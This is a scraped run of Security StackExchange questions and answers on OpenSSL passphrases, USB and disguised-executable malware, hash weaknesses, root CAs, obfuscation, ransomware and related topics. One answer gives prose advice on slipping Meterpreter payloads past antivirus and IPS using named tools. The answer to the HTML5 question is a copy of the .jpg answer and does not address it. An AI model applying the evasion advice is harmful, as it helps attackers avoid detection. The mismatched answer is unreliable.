Ditch "-nodes" If you actually WANT encryption, then you'll need to remove the (awkwardly named) -nodes (read: " No DES encryption" ) parameter from your command. Because -nodes will result in an unencrypted privkey.pem file. And if you leave it out, then the file will be encrypted. So without -nodes openssl will just PROMPT you for a password like so: $ openssl req -new -subj "/CN=sample.myhost.com" -out newcsr.csr -sha512 -newkey rsa:2048 Generating a RSA private key .........................................+++++ ................+++++ writing new private key to 'privkey.pem' Enter PEM pass phrase: Verifying - Enter PEM pass phrase: ----- But interactive prompting is not great for automation. So if you don't want to be prompted then you might want to read on for how to use "Pass Phrase arguments". Use OpenSSL "Pass Phrase arguments" If you want to supply a password for the output-file, you will need the (also awkwardly named) -passout parameter. This is a multi-dimensional parameter and allows you to read the actual password from a number of sources. Such as from a file or from an environment variable. Or straight from the command line (least secure). Below are examples for each of these usages. (The official manpage lists even more password-sources in the "Pass Phrase Options" section (Archived here .)) Example: password from command line with "pass:" $ openssl req -new -passout pass:"Pomegranate" -subj "/CN=sample.myhost.com" -out newcsr.csr -sha512 -newkey rsa:2048 Generating a 2048 bit RSA private key ................................................................................................................................+++ ......................+++ writing new private key to 'privkey.pem' ----- $ openssl rsa -in privkey.pem -passin pass:'Pomegranate' | head -n2 writing RSA key -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEAsSP5kLRPP8wPODrnvuAeeoqGMqTOvRULL423vv6+zjYhwPUi Example: password from variable with "env:" $ export MYPASS='Elderberry' $ openssl req -new -passout env:MYPASS -subj "/CN=sample.myhost.com" -out newcsr.csr -sha512 -newkey rsa:2048 Generating a 2048 bit RSA private key ............................+++ .....................+++ writing new private key to 'privkey.pem' ----- $ openssl rsa -in privkey.pem -passin pass:'Elderberry' | head -n2 writing RSA key -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEAv0NnBnigPp+O9G4UXc0qSyeELdJJjTmnO9GEtE5GlPGoK7vW Example: password from file with "file:" $ echo "Farkleberry" > password.txt $ openssl req -new -passout file:password.txt -subj "/CN=sample.myhost.com" -out newcsr.csr -sha512 -newkey rsa:2048 Generating a 2048 bit RSA private key ......................+++ ...........+++ writing new private key to 'privkey.pem' ----- $ openssl rsa -in privkey.pem -passin pass:'Farkleberry' | head -n2 writing RSA key -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAsHICgYvqe4i9CIR5eQk38JJmuTaJQvyxPH9S+BahT5XWh88z Related Reading https://stackoverflow.com/questions/4294689/how-to-generate-an-openssl-key-using-a-passphrase-from-the-command-line
{ "source": [ "https://security.stackexchange.com/questions/106525", "https://security.stackexchange.com", "https://security.stackexchange.com/users/47506/" ] }
106,526
Assuming that I'm using a trusted USB flash drive (meaning that it's not some device that looks like a USB drive and whose purpose is to damage my PC), is it possible for my PC to get infected from some malware picked up by the USB if I'm running an antivirus program that doesn't allow any autorun.inf files to run from the USB drive? I have two PCs, one running Windows 10 and the other running Windows 8.1.
Short answer: YES You can be infected even with a full patched Windows system and an updated antivirus. This happened before and can happen again. A few years ago, the Stuxnet worm was specially engineered to attack the Iranian nuclear facilities. They got hit by using infected USB drives, without autorun.inf or executing anything by hand. Those vulnerabilities are called zero day . The attacker knows it, but the vendor and antivirus companies does not. But those vulnerabilities are very prized, and will not be used on a low-value target, because as soon as the attack is detected, it's not a zero-day anymore. If you are not a high-value target, you usually don't have to worry about being hit by a zero-day. Usually you will get hit by an social engineering attack, and probably will step onto the trap by yourself, like opening an executable file with the icon of a pdf or a picture...
{ "source": [ "https://security.stackexchange.com/questions/106526", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92964/" ] }
106,689
I’m not talking about server-side security or even necessarily XSS vulnerabilities, as these are attacks on vulnerable services and do not use any pre-existing vulnerabilities on the client side to affect an end user. They will exist as long as web developers keep making vulnerable web applications. I want to focus on the security of the end-user in these two different scenarios: Flash installed and enabled, but JavaScript disabled JavaScript enabled, Flash not installed or enabled I am interested in the answers that I might get from posing a type of question that requires the comparison of two almost completely different (internally), yet competing technologies, in terms of end-user security.
In theory, if all servers and connections to them were perfectly secure (impossible) and trustworthy (not true), neither one would be more "secure" than the other - mainly because the developer(s) of the website are in full control of the content of the site. Since Flash and the JS is served to clients, the server would have to serve malicious content to the end user in order for the end user to be affected. Sadly, we don't live in a perfect world and JS tends to be more secure in the case of a server compromise - it is far more limited in its ability to affect the client. Many Flash vulnerabilities have the ability to execute arbitrary code, which is far more damaging than browser exploits, which often require multiple vulnerabilities to break out of the sandbox. This means that JS exploits often can only manipulate the client while the client is viewing that page and is usually unable to persist after it is closed, whereas Flash exploits can infect clients with RATs or other malware, which enables the attacker to have control over the client even after the browser is closed. Another benefit of using JS is that the source is viewable by clients. Someone using the site may notice something suspicious in the source and notify the developers, allowing for the intrusion to be more easily detected. In the case of Flash, a malicious attacker can inject malicious code into an existing swf and since users cannot view the source without dissembling the swf, malicious code may go undetected for longer. For an end-user, scenario 2: JavaScript enabled, Flash not installed or enabled would be much safer for the reasons above and given Adobe Flash's history of exploits. A search in the NVD reveals a total of 610 vulnerabilities , 330 of which are between January 2014 and December 2015. Most JS-related exploits tend to be browser specific, which reduces the number of clients affected, while Flash is meant to be cross-platform, which increases the number of affected clients (less nowadays, considering that many people have Flash disabled). TLDR: Keep Flash off and use JS instead.
{ "source": [ "https://security.stackexchange.com/questions/106689", "https://security.stackexchange.com", "https://security.stackexchange.com/users/93108/" ] }
106,737
I just received a .jpg file that I'm almost positive contains a virus, so I have two questions about what I am able to do with the image. My first question originates from the fact that I opened the file once and the program I used to open it gave the error "invalid or corrupt image". So I want to know whether or not its possible a virus contained inside the image could still have been executed if the software did not 'fully' open the image? My second question is if there is any way to decode/decompile the image data in order to better view its contents. Currently I'm using Notepad++, I just opened the file and am looking at its raw contents, which is one of the reasons why I'm so confident its a virus: So is there a better way to find out what the virus does and how it works? I need to know whether or not my security has been compromised. EDIT: Reasons why I think it contains a virus: It's way bigger than the image I was expecting Scan Looking at contents in Notepad ( file ) The way the person who gave me the file acted
Based on the description at Virustotal you've linked to this is in reality not an image, but a real PE32 executable (normal windows executable). So only the file name extension was changed to hide the real purpose of the file. PE32 will not be automatically executed when they have the .jpg extension like in this case. Also the image viewer which will be invoked with the file by default will not execute the code but instead exit or complain that this is not a valid image. Thus this file would not work alone. But such files are typically used together with another file which will rename it to name.exe and execute it. This can be done by some batch file, with the help of the Windows Scripting Host ActiveX inside a website or mail or similar. This strategy is used to bypass antivirus and firewalls which might skip analyzing the "jpg" file because of the extension and will not find anything suspicious in the accompanying script (which only renames the file and executes it). ...if there is any way to decode/decompile the image data Again, this is not an image but an executable so the tool of choice could be some disassembler, debugger, sandboxed execution etc. See also the analysis from Virustotal .
{ "source": [ "https://security.stackexchange.com/questions/106737", "https://security.stackexchange.com", "https://security.stackexchange.com/users/93150/" ] }
106,748
I have been asked to post this here: I want to focus on the security of the end-user in these two different scenarios: 1) Pre HTML 5 where the applications and so on lived in plug ins outside the browser sandbox by way of Flash and Java installed and enabled. 2) Post HTML 5 and applications being moved into the browser sandbox so you no longer need to breach the browser environment to get at this data and applications, and hooks into system hardware like cameras and so on given directly to the browser by way of HTML and JS accessible hooks built into the browser it's self. I’m not talking about server-side security. Nor the core OS that may run the browser environment. I am referring to User Data and as the Browser becomes the OS as far as the user is concerned what they care about being safe from attack. There is a big cry that FLASH is unsecure (and it is), and that HTML 5 is better (but will it stay that way?). As we move all the data and applications into the browsers, and add the hooks to let the web pages Java Script control hardware in the same way Flash and Java were used will that hold true? Or will the addition of these features create similar breached of privet data and loss of control of applications stored in the browser, possibly even allow remote hack of the browser as an OS setup? While these breaches could in theory be limited to the browser level, as the Browser in effect become OS like to the end user: would the average end user distinguish those attacks from what we see now with Flash and Java? Or would they likely be perceived as the same to the average end user?
Based on the description at Virustotal you've linked to this is in reality not an image, but a real PE32 executable (normal windows executable). So only the file name extension was changed to hide the real purpose of the file. PE32 will not be automatically executed when they have the .jpg extension like in this case. Also the image viewer which will be invoked with the file by default will not execute the code but instead exit or complain that this is not a valid image. Thus this file would not work alone. But such files are typically used together with another file which will rename it to name.exe and execute it. This can be done by some batch file, with the help of the Windows Scripting Host ActiveX inside a website or mail or similar. This strategy is used to bypass antivirus and firewalls which might skip analyzing the "jpg" file because of the extension and will not find anything suspicious in the accompanying script (which only renames the file and executes it). ...if there is any way to decode/decompile the image data Again, this is not an image but an executable so the tool of choice could be some disassembler, debugger, sandboxed execution etc. See also the analysis from Virustotal .
{ "source": [ "https://security.stackexchange.com/questions/106748", "https://security.stackexchange.com", "https://security.stackexchange.com/users/93156/" ] }
106,762
These days I am testing various type of client hacking techniques, but in all scenarios I am using Meterpreter variations as payload. Now I can bypass Anti-Virus and Firewalls easily, but Symantec Sonar and IPS always detect Meterpreter payloads and block the attacker IP. Is there any better payload than Meterpreter that can bypass IPS? Is there any payload writing tutorial on the net that matches my needs?
Bypassing AV and IPS can be done through meterpreter or any other RAT. Most of the time meterpreter is handy because first it is open source and second it is implemented as a reflective DLL which insert itself in the exploited process without touching the disk. AV solutions can be bypassed easily through the Veil Evasion project while reverse_https meterpreter can bypass the IPS since the connection is encrypted. You have the option of Stage Encoding for encoding the second stage metsrv.dll as well which can bypass a lot of IPS solutions. Also, the stageless meterpreter over HTTPS is very handy in bypassing the host and network based detection solutions as well. However, sometimes meterpreter being a synchronous payload where the user needs to interact with the session becomes difficult to manage e.g. when client side attacks or campaigns need to be executed over large periods of time. In such cases, you always have the option of using Throwback , Pupy , or the Cobalt Strike's Beacon payload. The advantage of these payloads is that they are asynchronous in nature and all of them are implemented as reflective DLLs which means they can be used with Metasploit through the payload/windows/dllinject/ payload type. And since these payloads are not used as often as the plain meterpreter in the Metasploit source tree, they can bypass many AV and IPS solutions out of the box. Lately, the payloads implemented in pure Powershell can bypass AV as well as IDS/IPS. Powershell Empire is one such payload implemented in pure Powershell. One thing that was missing from Meterpreter is to script the actions in the first stage without contacting the handler. Such a thing is now in the main source with Python meterpreter, and in the coming days, the functionality will be ported to other meterpreter payload types as well. Take a look at my answer at Techniques for Anti Virus evasion for a list of techniques for bypassing AV for further explanation on the topic.
{ "source": [ "https://security.stackexchange.com/questions/106762", "https://security.stackexchange.com", "https://security.stackexchange.com/users/93177/" ] }
106,843
Pretty much every guide, how-to, and reference for dealing with passwords and hashing has a warning in big or bold letters stating something along the lines of: SHA-1 and MD5 are NOT secure and should not be used. Fair enough, it's not much trouble to use SHA-256 or something else. But have there been any examples of said weaknesses actually being successfully used in an attack? Just how much weaker do these vulnerabilities make the algorithms?
I'm not aware of any publicly known attack using collision in SHA-1, but MD5 collisions were probably used already 2010 within attacks. In 2012 it was discovered that a malware from the Flame attack had a valid signature from Microsoft, which was possible due to a MD5 collision attack. See http://blogs.technet.com/b/srd/archive/2012/06/06/more-information-about-the-digital-certificates-used-to-sign-the-flame-malware.aspx for more details. As for using MD5 or SHA-1 with passwords: Simple hash some trivial password with MD5 or SHA-1 and then look up the hash with google. Example: password: "secret" md5 (hex): "5ebe2294ecd0e0f08eab7690d2a6ee69" sha1 (hex): "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4" The first hit on google for the MD5 hash presents you with the password, as does the first hit when searching for the SHA1 hash . Thus typical passwords can easily be detected as long as the hash is not salted. Apart from that, even SHA-256 is a bad choice for passwords. These kind of hash algorithms are designed to be fast which only makes brute-forcing passwords easier. For more details about this topic see How secure are sha256 + salt hashes for password storage .
{ "source": [ "https://security.stackexchange.com/questions/106843", "https://security.stackexchange.com", "https://security.stackexchange.com/users/87083/" ] }
106,847
Doxing (publicly releasing private information about an individual, to make it easier to harass them) is becoming an increasingly popular tactic not just for hackivists and Anonymous, but also for petty individual revenge. What are actionable, best practice steps that an individual should take to regain control of their personal information after they have been doxxed? A lot of social engineering advice is predicated on not releasing such information, or controlling access to it — clearly useless to a victim in this situation. If details are needed, assume the following are present in the document dump: Name, physical address, telephone number Facebook profile, email address Work history including contact numbers for employers past and current Family members, their relationship and address or phone number Assume that the victim was the victim of a personal attack, rather than a corporate breach, and thus has no IT or legal resources to draw upon.
Once your information is made public, you cannot make it private again. That is unfortunately one of the things the Internet gives us. You can make formal complaints to sites hosting the information, but assume it will be there, available in large stores of PII, for bad guys to do with as they will. So all you can do is decide which of those things you need to change, eg by moving house, changing your name, job, mobile phone number etc. Personally, the only ones I'd want to change if I was under a personal attack would be email and phone numbers. If the attack grew to be physical, I'd get the police involved and if necessary, move and change my name.
{ "source": [ "https://security.stackexchange.com/questions/106847", "https://security.stackexchange.com", "https://security.stackexchange.com/users/70682/" ] }
106,855
I work as the primary developer and IT administrator for a small business. I want to ensure that business can continue even if I suddenly become unavailable for some reason. Much of what I do requires access to a number of servers, (through key-based ssh), cloud services, and other secure infrastructure of applications. Some of these services use MFA, either using dedicated MFA apps (like Amazon) or SMS. How do I ensure that my "hit by a bus" plan and documentation is complete and comprehensive, but that this documentation is not itself a security risk? The documentation will be hosted on a shared file server behind our VPN, but that can also be accessed using a third party web frontend that puts a "DropBox"-like interface on top of the base file server (i.e. authentication, desktop syncing, file sharing, etc). The files are in a location where only I, and other file server administrators can see them. How should I manage the "secrets" (passwords, private keys, MFA access) in this documentation to ensure it remains comprehensive without compromising security?
My advice would be to remove the secrets from the drop-box and store them elsewhere. Your instructions have to be easily human readable by anyone, but they can include instructions on how to get access to the properly secured part of the data. That lets you separate the accessibility side of things from the security side. Once you can think about security on its own, you can start to ask the real question of how much do you need to protect these keys? This is a business logic question, so consult your management. You might: Have a password to a file that everyone knows Have a file set up with multiple passwords so that each individual maintains their own copy. Have a file locked by a M-out-of-N algorithm (the digital equivalent of requiring two keys to unlock a safe). Have a M-out-of-N algorithm with one 'master' password required regardless of which group of individuals unlocks the file, and that one master is physically kept in a tamper-evident safe that you check every now and then. Use creativity here. Whatever you do, the decoupling of "instructions" with "sensitive information" frees you to properly safeguard the information, and then provide instructions on how to get that data later. Your business logic decisions will also include uptime questions. If something goes wrong in your life, how long does another admin have to take over your work before business is affected? Consider how well replicated you want these instructions and sensitive information to be in case of server glitches. When I was administering a server and needed to store instructions on how to restore it from backup, I used the server's own wiki to store that information for easy viewing, but obviously that wouldn't be so useful in a glitch scenario, so I also had a copy on the dev VM of that machine, saved off copies of it on 3 separate PCs and a printout. I couldn't guarantee the printout would stay up to date, but I made sure that I could do my best. This also points out something which is not always part of a hit by the bus plan: graceful degradation. Not all hit-by-the-bus scenarios involve getting hit by a bus. Some involve you just being inaccessible at an unfortunate time. Some involve you leaving the company, but being available for a question or two. Others... do not. Consider layering the plan. Small mishaps may be very well protected, while greater mishaps may still result in business loss while everyone gets things together, but nothing permanent. To use my backup restoration plan as an example, the printed version was almost guaranteed not to be fully up to date. But if lightning wiped out every computer for a city block, it was still more helpful than nothing. On the other hand, if the server just thew a harddrive, and I had to restore from backup, the version I kept sync'd on the dev box was almost certainly up to date. Example of this failing: I was a user on a network managed by KERBEROS by an admin that was distrustful of others and did not have a hit-by-a-bus plan. When he... left, we had a hacking party to try to break his server. In the end, our best impromptu hit-by-a-bus plan was to wipe the machines (every one of them) and start from scratch. Note that, while this wasn't the best plan (in fact, I think its the worst plan?), the business kept moving. We just got stagnated for about two days and had a bunch of grumpy customers. In the words of Frank Herbert's Dune , "The spice must flow." Even in the worst case (which may involve a curious incident involving your server's harddrive flung out of the bus and hitting you on the head, destroying all record of the hit-by-a-bus plan), business does have a way to keep moving... but I approve of trying to raise the bar a wee bit more than that!
{ "source": [ "https://security.stackexchange.com/questions/106855", "https://security.stackexchange.com", "https://security.stackexchange.com/users/70458/" ] }
106,896
Is there any particular reason why the Steam application attempts to be so secure? It seems to force you to take more security measures (two-factor authentication, emails confirming all trades, etc) than most banks do. Is this due to the fact that the Steam software has some inherent security risks associated, or is it just because they want to avoid people complaining that their account was hacked? Is there any reason that Steam attempts to be more secure than most banks?
Steam has about 100 million users ( random link saying they had 75 million almost 2 years ago ). If they spend on average $10 per year, we're talking $1,000,000,000 per year - and I'd say that's a conservative estimate ( random link saying they had 1 billion in revenue back in 2010 ). That's the same kind of money small banks deal with . Then there is almost certainly a large number of low tech attackers . Steam is used by a lot of kids who don't yet have a proper understanding of legality, so at least some of them will try to steal the account of that other kid that smells funny. To be clear: "some" of 100 million is "lots". These attackers often live in the same town and maybe even saw the other kid typing in the password before, which breaks some traditional safeties based on IP range and passwords. Stolen accounts create customer support costs. Widespread reports of stolen accounts create bad press, which destroys trust. For a digital market, trust is money. Valve also works with a huge number of partners. These partners can act maliciously and try to break/abuse the billing process , which will directly hurt Steam's reputation and therefore lose Valve some serious money, unless the abuse is detected and dealt with swiftly. EDIT: [...] enough money now moves around the system that stealing virtual Steam goods has become a real business for skilled hackers [...] We see around 77,000 accounts hijacked and pillaged each month. - 9 Dec 2015 http://store.steampowered.com/news/19618/ So in addition to a large number of low tech attackers, there's a large number of high tech attackers as well.
{ "source": [ "https://security.stackexchange.com/questions/106896", "https://security.stackexchange.com", "https://security.stackexchange.com/users/64559/" ] }
106,910
By my admittedly limited understanding of how HTTPS/TLS works, the end user (me) initiates a connection with a remote server which signs every one of its messages with a public key. This public key can be verified (magically) by checking the certificate, which is signed by a CA that vouches for the integrity of that certificate. The upshot of this is that if I trust a CA, that CA can sign any certificate and say it is valid and my machine will be just fine with it; if a rogue CA is added to the trusted registry of my computer, then anyone who knows that rogue CA will be able to get their cert signed and pose as - potentially - any website and perform a man in the middle attack. My corporation has just added their own cert as a root CA to all computers in the network. Should I therefore assume that all traffic I send is compromised?
Yup. Yes. (If you consider "My company's admins can change my HTTP(s) traffic" compromise.) Except for some programs that pin their certificate use and fail if another certificate is used. That's pretty much the idea of SSL inspection: Open up SSL/TLS, do some anti-virus-scanning, close up SSL/TLS again. And in place of that "do some anti-virus-scanning" you can substitute any manipulation of the traffic, you want. But on the other hand: whoever can install a root CA on your system has superuser power already. So there's a million other ways that they can interfere/listen in.
{ "source": [ "https://security.stackexchange.com/questions/106910", "https://security.stackexchange.com", "https://security.stackexchange.com/users/81656/" ] }
106,914
Follow up from comments on another question . Is there any reason as to why you might install yourself as a root CA on your own network? The only reason I can think of is forcing computers in the network to trust your own self signed certificates instead of getting them digitally signed by a 3rd party CA.
A custom CA is required if you want to use https on your corporate intranet. 3rd party CAs can only give you certificates for public domains. They won't give you certificates for intranet.local or any other hostnames which are only routed in your own network. So when you want to have a certificate for your intranet or for the web interface of your own servers, you need to add a custom CA and sign it yourself. You might ask yourself "Why would I use https on my own network"? There is currently a trend to implement everything as a browser-based application. This means more and more processes are handled through internal web interfaces, including sensitive ones. For example, our company is currently implementing a web-based intranet application to view our own payslips (and hopefully only our own). But in larger organizations, the internal network can become so large and complex that you can't really speak of a private LAN anymore. Eavesdropping from internal attackers becomes a possibility which can not be handwaved away, so internal encryption becomes a reasonable precaution.
{ "source": [ "https://security.stackexchange.com/questions/106914", "https://security.stackexchange.com", "https://security.stackexchange.com/users/81656/" ] }
106,953
About two months ago, I deployed an Ubuntu server with as main purpose serving a web app. However, I'm still developing the app and only gave the server IP to my coworker and some friends for testing. Yesterday I checked the fail2ban logs and noticed many SSH bruteforce attempts from China, France etc. that dated to before I gave out the IP. I also checked my server access logs and noticed some malicious attempts on URLs from the same IPs, trying to bruteforce SSH. One example of a request they made is myip/otherip/file.php . I'm not sure how to interpret this. I traced back the IP of that server and it's on the same hosting company I'm on. Question : How did they find out about the IP of the server before I even served the app from it or gave it out? My guess : I'm guessing it is some bot that keeps trying on different IPs of some pattern that leads to servers of the same hosting company. Is that a correct assumption, or are there other possibilities?
Your guess is likely correct. The big server hosters have continuous IP ranges from which they assign IPs to their customers. Low budget hosters are frequently used by amateurs who don't know what they are doing, so it's likely that they use easy to guess passwords or set up insecure web applications. This makes these IP ranges valuable targets for black-hats. When you notice such attacks from within the hosters network, you should report them to the hoster, because this is very likely a breach of the terms of use... or a server from another customers where the black-hats were already successful.
{ "source": [ "https://security.stackexchange.com/questions/106953", "https://security.stackexchange.com", "https://security.stackexchange.com/users/93270/" ] }
107,025
There are many tools to obfuscate .NET applications. The free ones do some basic obfuscation while commercial ones seem to promise more. My question is: Is it worth to use the commercial obfuscation tools? Do they provide some security? I know everything is crackable if someone wants it badly. But I am talking about some "average" attackers. So is it worth to invest money in commercial obfuscators? If someone is interested what I want to protect: program logic and/or keys (I know keys should not be stored in app but I am limited in where I can store it anyway due to context) Note: Some users are mentioning that sometimes obfuscator may introduce bugs in working program. This is clearly bad. If someone can cover his/her experience about this kind of behaviour would also be useful. Is this behaviour different w.r.t to commercial vs free obfuscators?
The problem with client sided Obfuscation/Protection is that the attacker will always win. Your code runs on his PC so he can intercept and manipulate everything in the end. In the specific case of .NET it might make sense to apply basic obfuscation to remove function names for example but free tools are perfectly fine for that. To answer your question a bit more specific: Most commercial obfuscators do the same things that free ones do as well. I'd go for Confuser/ConfuserEx, both are open source and provide better protection than most commercial stuff.
{ "source": [ "https://security.stackexchange.com/questions/107025", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
107,065
For example, when I enter this URL: https://www.google.com/search?q=example or http://www.google.com/search?q=example I can see the word example that I was searching on Google. Can the ISP see this URL and so maybe register it in their logs?
The ISP can see GET and POST Parameters of websites that don't use SSL can see DNS requests (-> which domains did you visit) So in your example the ISP would not see the search request as GET Parameters are encrypted with SSL ( ref ). Conclusion: the ISP would know THAT you searched on Google but it wouldn't know WHAT you searched for.
{ "source": [ "https://security.stackexchange.com/questions/107065", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91265/" ] }
107,081
There are many different hash functions, md5, sha, and others. They take a value V and produce a H via transformation Function(V) = H , where Function is md5, sha, etc. My question is: Does every hash value H have a value V ? For example, given md5 hash value f2c057ed1807c5e4227737e32cdb8669 (totally random), can we find what it was from? In other words, if we list all hashes: 00000000000000000000000000000000 00000000000000000000000000000001 ... fffffffffffffffffffffffffffffffe ffffffffffffffffffffffffffffffff Can we find a value for each one of them? Edit (from OP's comment): I want to know if there exists an input for each possible output. I'm not interested in finding inverse
My question is: Does every hash value H have a value V? For example, given md5 hash value f2c057ed1807c5e4227737e32cdb8669 (totally random), can we find what it was from? These are actually two very different questions: whether there is an input for each output, and whether we can find an input for each output. For your first question: we do not know. For a given hash function, the number of possible inputs is a lot bigger than the number of possible outputs, so we would find it very surprising if the function was not surjective (i.e. if there was an output without any matching input). For instance, with MD5, there are 2 128 possible outputs, and 2 18446744073709551616 -1 possible inputs, so we expect that each output has, on average, about 2 18446744073709551488 corresponding inputs. It is rather implausible that there is an output with no corresponding input. However, we do not know how to prove it. To a large extent, we expect that property to be very hard to prove for any concrete hash function (such a proof of surjectivity would not, per se, be a weakness of the function, but, handwavingly, the security of a hash function relies on the intractability of its structure with regards to that kind of analysis). For your second question: we strongly hope that it is infeasible. This is what is called preimage resistance : for a given output y , it should not be computationally feasible to find a x such that h ( x ) = y . Even if it was mathematically proven that such an input must exist (it is not proven, but it is strongly suspected, as explained above), it should still be atrociously expensive to actually find it. If the hash function is "ideal" then the best possible attack is luck : you try out possible inputs until a match is found. If the output has size n bits, then "luck" should work with an average effort of 2 n ; with n large enough (and n = 128 is large enough), this is way out of what can be done with existing computers. A hash function is said to be resistant to preimages if "luck" is still the best known attack. It is known that MD5 is not ideally resistant to preimages, because an attack with effort 2 123.4 has been found -- about 10 times faster than 2 128 , but still a long way into the realm of infeasibility, so that attack is theoretical only. I would like to point out two things, though: If I give you h ( x ) for an unknown x , but you have some idea about the x that I used (e.g. you know that x is a "password" that a human user could choose and remember), then you can try possible x values that match that idea. The actual average effort for finding a preimage to h ( x ) is the smaller of 2 n and M /2, where M is the size of the space of possible inputs x . For a "raw" preimage attack, all sequences of bits are possible inputs, so M is huge and the cost is 2 n . However, if, in a specific context, x is known to be taken out of a relatively small space, then finding the "right" x can be substantially faster. As pointed out above, preimages are not supposed to be unique: for a given y , a large number of values x should exist, that hash to y . Thus, for a given output, you do not find "the" corresponding input, but "a" corresponding input, which may or may not be the "right" one. And the third question ? Indeed, trying to make a complete map of inputs-to-outputs is yet something different. As @Xander pointed out, the number of possible MD5 outputs (2 128 ) is too large to be stored anywhere on Earth; it exceeds the cumulated size of all hard disks that have ever been built. However, if you could solve that storage issue, then it is possible to think about the cost of making a complete map. If you use the "luck" attack on all 128-bit outputs independently, you may expect an overall cost of 2 256 (2 128 times a cost of 2 128 ). However, you can do much better by handling all outputs simultaneously, i.e. trying out random (or sequential) inputs and simply populating your big table as you obtain the outputs. With effort 2 128 , you should get about 63% of your complete map, while the "independent luck" method would need an effort of a bit more than 2 255 to achieve the same result. Edit: as was pointed out by @Owen and @kasperd, the arguments on the number of inputs are not actually sufficient to induce surjectivity; the internal function structure matters. MD5 and SHA-1 are Merkle–Damgård functions, meaning that they are built as follows: There is an inner pseudorandom permutation P : for an input block b of a given size (512 bits in the case of MD5 and SHA-1), P b is a permutation of the space of sequences of exactly n bits ( n = 128 for MD5, n = 160 for SHA-1). A compression function is defined, as: f ( b , x ) = P b ( x ) + x That is, for block b , we apply the permutation corresponding to b on the second input x , and then we "add" x to the output of that permutation. (In the case of MD5 and SHA-1, that addition is done on a 32-bit word basis, but the details do not matter here.) To process a complete input message m , the message is first padded with extra bits so that the total size becomes a multiple of the block size, and also encodes the original message length. The padded input is then split into successive blocks b 0 , b 1 , and so on. A register r is initialized to a conventional value of size n bits (the "IV", specified in the MD5 and SHA-1 standards). Blocks are then processed one by one: to inject block b i , we compute f ( b i , r ), and the output is the new value of r . When all blocks have been processed, r contains the complete hash function output. The addition step in the compression function turns the pseudorandom permutation P b into a pseudorandom function . A relevant consequence is that, for a given value b , f ( b , x ) is very unlikely to be surjective. In fact, we expect values f ( b , x ), for all 2 n inputs x , to cover only about 63% of all possible 2 n sequences of n bits. This processing has interesting consequences. First, consider all inputs of size exactly 1 GB (the "traditional" gigabyte of exactly 1073741824 bytes): there are 2 8589934592 such sequences, i.e. a lot more than 2 128 . However, when applying MD5 on all these messages, they will all be padded with exactly one extra block (8589934592 = 16777216×512, so an extra block of size 512 will be appended), and, furthermore, this final block will be the same for all 1 GB inputs (it encodes the input length but is otherwise deterministic, with no randomness and no dependence on the values of the input bits). Let's call b z that final block. MD5 on a 1 GB input message m thus begins with a lot of processing on the first 16777216 blocks, resulting in a 128-bit value x , and the hash output MD5( m ) is equal to f ( b z , x ). Therefore, all 1 GB messages ultimately reduce to a single of the same compression function f ( b z , x ). Thus we expect the hash outputs to cover only about 63% of all 128-bit sequences. This example demonstrates that the argument on the number of inputs to the hash function is incomplete (though it gives the right idea). Conversely, if we consider all messages of exactly 300 bits in length, then they will all be hashed as f ( b , IV), with 2 300 distinct blocks b . We thus have 2 300 pseudorandom permutations P b , all applied on the same 128-bit input (the IV), yielding 2 300 128-bit results which are all, then, supposed to be uniformly distributed over the space of 128-bit values. Adding IV to all of them does not change that uniformity. In that case, the counting argument works and thus sujectivity becomes highly probable. Edit 2: About the "63%". When you generate a random value, uniformly, in a space of size N , then the probability of hitting a given value x is 1/ N ; thus, the probability of not hitting a given value x is ( N -1)/ N . Now try it N times: you generate N values randomly, uniformly and independently (in particular, you may generate several times the same value). For a given x , the probability of not being part of these N values is the probability of having been missed N times, i.e.: P = (( N -1)/ N ) N . This can be approximated as follows: P = e N ln (1-1/ N ) = e N (-1/ N + o(1)) = e -1+o(1) Thus, with big values of N , the probability of any given value being missed approaches 1/ e . Therefore, the expected coverage of the space of size N , with N random values, would be close to 1-(1/ e ). This is approximately 63.21%.
{ "source": [ "https://security.stackexchange.com/questions/107081", "https://security.stackexchange.com", "https://security.stackexchange.com/users/57387/" ] }
107,285
A company I support/do work for has been hit with ransomware. I've gone down all the data recovery paths etc ... and the business has decided that paying the ransom is cheaper then rebuilding and trying to recover. My question is: has anyone gone through the process of paying a ransomware company? Once you pay, do the bad guys send you a private key and if so, how do you use it to decrypt files? EDIT: ( by request as people requested information below and figured it might help some others who find this topic ) As far as the type goes, I think it might be a variant of CryptoLocker. The application was nowhere to be found after the hit. I ran 3 different AV scans and found no signs of anything. All I had to go on was this image: I narrowed down the attack to be that of Cryptowall 4.0 judging by the URL being used. I traced that URL to a mailing list for SNORT and saw Cryptowall 4.0 being mentioned. Here is a forum topic with some talk that matches what I am seeing here for those interested
First, determine which variant of ransomeware you've been hit by. Depending on which one, you may have more options. As @Ohnana has said generally ransomware operators are true to their word, it's in their interest after all. If it became known that certain groups never allowed data to be decrypted, they'd stop getting money from their victims. That being said I'd suggest that it is important before you pay to try and establish which variant you've become a victim of. There's freely available decryption tools for several variants , and there's at least one documented variant which contains a bug which makes decryption impossible . Once you've established which variant you have you will be able to quickly research what you can expect the decryption process to be, and if you can do it using a free tool rather than by paying the ransomware operator.
{ "source": [ "https://security.stackexchange.com/questions/107285", "https://security.stackexchange.com", "https://security.stackexchange.com/users/31084/" ] }
107,413
I am currently receiving an order of computer parts in the mail including an SSD. Tracking showed that the package arrived in my town on day X, and was originally scheduled for delivery on day X as well. Tracking now says it is going to be delivered on day (X+3). Being the paranoid person that I am, is there a reason to fear that the SSD is being tampered with/malware installed on it? Is there anything I can do before/when I install the OS in order to check for tampering?
If you don't want to be at risk, in the future get a third party to purchase stuff like this in cash, from a store not near your house or work. You should see if you can download firmware for the drive from the manufacturer's site. Update the firmware on the drive, or at least check its signature. Remember, it is near Christmas and shipping is likely to take longer than normal.
{ "source": [ "https://security.stackexchange.com/questions/107413", "https://security.stackexchange.com", "https://security.stackexchange.com/users/81872/" ] }
107,417
